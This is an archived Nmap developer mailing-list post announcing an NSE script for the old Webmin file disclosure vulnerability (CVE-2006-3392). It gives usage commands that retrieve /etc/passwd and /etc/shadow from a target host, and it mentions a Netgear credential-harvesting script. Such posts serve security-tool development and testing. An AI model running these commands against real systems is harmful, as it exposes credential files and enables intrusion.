Nmap Development mailing list archives

NSE Script for Webmin File Disclosure exploit (CVE2006-3392)


From: Paul AMAR <aos.paul () gmail com>
Date: Sun, 4 May 2014 14:34:46 +0200

Hi there,

For some challenges, I had to exploit Webmin File Disclosure vulnerability
(quite old).
This vulnerability is associated with the following CVE: 2006-3392.

Few references:
http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
http://www.exploit-db.com/exploits/1997/

To use the script:

./nmap -p10000 -n -Pn --script http-vuln-cve2006-3392 192.168.1.86 -d
*This will retrieve /etc/passwd* *by default*

./nmap -p10000 -n -Pn --script http-vuln-cve2006-3392 192.168.1.86
--script-args http-vuln-cve2006-3392.file=/etc/shadow -d


*You can either specify the file you want to retrieve*
Cheers,
Paul

ps: Any idea when my script for Netgear WNR1000v3 Credential Harvesting
Exploit will be added to the current revision?

Attachment: http-vuln-cve2006-3392.nse
Description:

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/

Current thread: